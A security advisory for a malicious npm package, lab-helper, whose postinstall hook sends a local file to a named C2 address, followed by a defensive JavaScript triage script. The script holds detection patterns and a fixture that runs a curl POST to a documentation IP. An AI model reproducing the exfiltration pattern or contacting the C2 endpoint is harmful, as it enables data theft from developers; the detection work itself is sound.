MAL-2026-5835
Malicious code in lab-helper (npm)
Details
## Source: amazon-inspector (9bbde4e4075983db0c5aba255bc29f84fb2536681b13e8289412cce5c3ee7a2e)

On `npm install`, the package's `postinstall` hook runs `sec_check.js`, which enumerates the host's network interfaces and proceeds only if an IPv4 address begins with `18.175.` — a subnet-based targeting gate that hides the behavior on most developer/CI machines. When the gate passes, the script reads `<INIT_CWD>/myfile.txt` from the installer's working directory and uses `curl -X POST` to upload its contents to a hardcoded plaintext C2 at `http://18.175.63.47:8080/collect`. The combination of a lifecycle-script auto-execute path, network-identity targeting to evade scanners, hardcoded bare-IP exfiltration endpoint, and reading installer-side files matches a targeted supply-chain attack against a specific environment (likely an AWS/lab subnet).
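Added example, not code from the advisory or from the package: a pre-install triage check in JavaScript that lists the lifecycle hooks a `package.json` declares and scans the script each hook invokes for the four indicators described above. The `package.json` and `sec_check.js` contents are constructed fixtures, `192.0.2.10` is a documentation address rather than the real endpoint, and the two-indicator threshold is an assumed review policy.

```javascript
// Added example (not the advisory's or the package's code): pre-install triage of
// an npm package's lifecycle hooks against the indicators the advisory describes.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Indicators from the advisory: interface enumeration (subnet targeting gate),
// reads from the installer's cwd, a curl shell-out, and a plaintext bare-IP URL.
const INDICATORS = [
  { id: "enumerates-network-interfaces", re: /networkInterfaces\s*\(/ },
  { id: "reads-installer-cwd", re: /INIT_CWD/ },
  { id: "shells-out-to-curl", re: /\bcurl\b[^\n]*-X\s*POST/ },
  { id: "plaintext-bare-ip-url", re: /http:\/\/\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?\// },
];

// Resolve the script a hook command runs: "node sec_check.js" -> "sec_check.js".
function referencedFile(command) {
  const m = /^\s*(?:node\s+)?([\w./-]+\.c?js)\b/.exec(command);
  return m ? m[1] : null;
}

// pkg: parsed package.json; files: map of relative path -> file text (read from
// the extracted tarball in real use). Returns one finding per install-time hook.
function triagePackage(pkg, files) {
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const command = pkg.scripts && pkg.scripts[hook];
    if (!command) continue;
    const file = referencedFile(command);
    const body = file && files[file] !== undefined ? files[file] : command;
    const indicators = INDICATORS.filter((i) => i.re.test(body)).map((i) => i.id);
    findings.push({ hook, command, file, indicators });
  }
  return findings;
}

// Assumed policy: two or more indicators on one auto-executing hook needs review.
function isSuspicious(findings) {
  return findings.some((f) => f.indicators.length >= 2);
}

// Constructed fixture mirroring the advisory's description; 192.0.2.10 is a
// documentation address and the file-upload step is deliberately left out.
const SAMPLE_PKG = { name: "example-pkg", version: "1.0.0",
  scripts: { postinstall: "node sec_check.js", test: "mocha" } };
const SAMPLE_FILES = {
  "sec_check.js": [
    'const os = require("os");',
    "const addrs = Object.values(os.networkInterfaces()).flat();",
    'const target = process.env.INIT_CWD + "/myfile.txt";',
    'execSync("curl -X POST http://192.0.2.10:8080/collect");',
  ].join("\n"),
};

console.log(JSON.stringify(triagePackage(SAMPLE_PKG, SAMPLE_FILES), null, 2));
```

Run it over the unpacked tarball from `npm pack` before installing; `ignore-scripts=true` in `.npmrc` stops the hook from executing while you review.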
Affected packages
No fixed version published yet for lab-helper (npm). Pin to a known-safe version or switch to an alternative.